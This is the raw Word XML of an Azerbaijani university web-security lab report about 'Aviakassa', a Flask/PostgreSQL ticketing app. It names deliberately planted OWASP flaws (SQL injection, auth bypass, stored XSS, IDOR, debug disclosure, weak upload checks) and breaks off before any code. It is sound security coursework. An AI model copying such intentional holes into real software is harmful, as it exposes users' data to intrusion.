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80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>AZƏRBAYCAN DÖVLƏT NEFT VƏ SƏNAYİ UNİVERSİTETİ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">İnformasiya Texnologiyaları Fakültəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E75B6" w:sz="12" w:space="8"/>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB TƏHLÜKƏSİZLİYİ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB HESABATı</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Layihə: Aviakassa — Tam Stek Veb Tətbiq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Tələbə: Mübariz Pashayev</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Qrup: 693.24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Müəllim: Həsənli Xatirə</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bakı — 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Xülasə</w:t>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Bu hesabat "Web Təhlükəsizliyi" fənni çərçivəsində hazırlanmış "Aviakassa" adlı tədris layihəsini əhatə edir. Layihə, hava bileti axtarışı və rezervasiya mövzusunda qurulmuş tam stek (full-stack) veb tətbiqidir: Flask (Python) backend, PostgreSQL verilənlər bazası və Vanilla JS + HTML frontend-dən ibarətdir.</w:t>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Hesabat iki əsas məqsədi əhatə edir: (1) real texnologiya yığımı üzərində işlək veb tətbiq qurmaq; (2) OWASP Top 10 (2021) çərçivəsindəki kritik zəiflikləri — SQL Injection, Auth Bypass, Stored XSS, Broken Access Control, IDOR, Information Disclosure, File Upload — nəzarətli laboratoriya ssenarilərində nümayiş etdirmək. Hər zəiflik üçün həm boşluğu göstərən "lab" kodu, həm də onu aradan qaldıran mitiqasiya yanaşması müqayisəli şəkildə təqdim olunur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="24"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Xəbərdarlıq: Bu layihədəki bütün zəifliklər yalnız tədris məqsədi üçün bilərəkdən daxil edilmişdir. İstehsal mühitlərindən istifadəsi qəti qadağandır; real deploy-da WEBSEC_LAB=0 parametri mütləq təyin edilməlidir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Mündəricat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Giriş və Məqsəd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.1. Layihənin Konteksti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.2. Layihənin Məqsədləri</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.3. Lab Rejimi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.4. Əhatə Dairəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Arxitektura və Texnologiyalar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Layihənin Qurulması (Setup)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Backend: Əsas Komponentlər</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Təhlükəsizlik Boşluqları — Lab Ssenarilər</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    6.1. SQL Injection (OWASP A03:2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    6.2. Autentifikasiya Bypass (OWASP A07:2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    6.3. Məlumat İfşası (OWASP A09:2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    6.4. Broken Access Control (OWASP A01:2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    6.5. IDOR — Düzgün Nümunə (OWASP A01:2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    6.6. Stored XSS (OWASP A03:2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    6.7. File Upload (OWASP A08:2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Yamalar Xülasəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Deploy (Vercel + Neon PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Nəticə</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10. İstinadlar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Giriş və Məqsəd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1. Layihənin Konteksti</w:t>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Bu hesabat "Web Təhlükəsizliyi" fənni çərçivəsində hazırlanmış tədris layihəsini əhatə edir. Layihə Aviakassa adlanır — hava bileti axtarışı və rezervasiya mövzusunda qurulmuş tam stek veb tətbiqidir. Tətbiq Flask (Python) backend, PostgreSQL verilənlər bazası və Vanilla JS + HTML frontend-dən ibarətdir.</w:t>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Layihənin mövzusu (aviabilet satışı) yalnız kontekst rolunu oynayır; əsas diqqət veb tətbiqin arxitektura qurulmasına və təhlükəsizlik ssenarilərinin nümayişinə yönəlmişdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2. Layihənin Məqsədləri</w:t>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Layihənin iki əsas məqsədi vardır.</w:t>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Birinci məqsəd — real texnologiya yığımı üzərində işlək veb tətbiq qurmaq: e-poçt + parol əsaslı autentifikasiya (werkzeug.security ilə hash), Flask sessiya idarəetməsi (HttpOnly, Secure, SameSite cookie konfiqurasiyası), JSON əsaslı REST API (11 endpoint), PostgreSQL inteqrasiyası (psycopg2, RealDictCursor), fayl yükləmə + bulud deploy (Vercel + Neon/Supabase PostgreSQL).</w:t>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İkinci məqsəd — OWASP Top 10 (2021) çərçivəsindəki zəiflik ssenarilərini nümayiş etdirmək. Aşağıdakı cədvəldə layihədə nümayiş etdirilən OWASP kateqoriyaları göstərilir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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3800"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP 2021 Kateqoriyası</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5046"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Layihədəki Nümunə</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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A01 — Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5046"/>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Hardcoded e-poçt ilə admin yoxlaması; IDOR nümunəsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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A03 — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5046"/>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SQL injection (sətir birləşdirməsi); Stored XSS (about_me sahəsi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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A07 — Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5046"/>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Parol yoxlamasının lab üzrə keçilməsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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A08 — Software Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5046"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4D6"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Zəif fayl yükləmə yoxlaması</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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A09 — Security Logging Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5046"/>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Debug məlumatının API cavabında ifşası</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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Hər bir zəiflik üçün həm zəif kod (lab), həm də düzgün mitiqasiya yanaşması göstərilir. Bu müqayisəli öyrənmə üsulunun əsasıdır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3. Lab Rejimi</w:t>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Layihənin zəiflikləri mühit dəyişənləri ilə idarə olunur:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
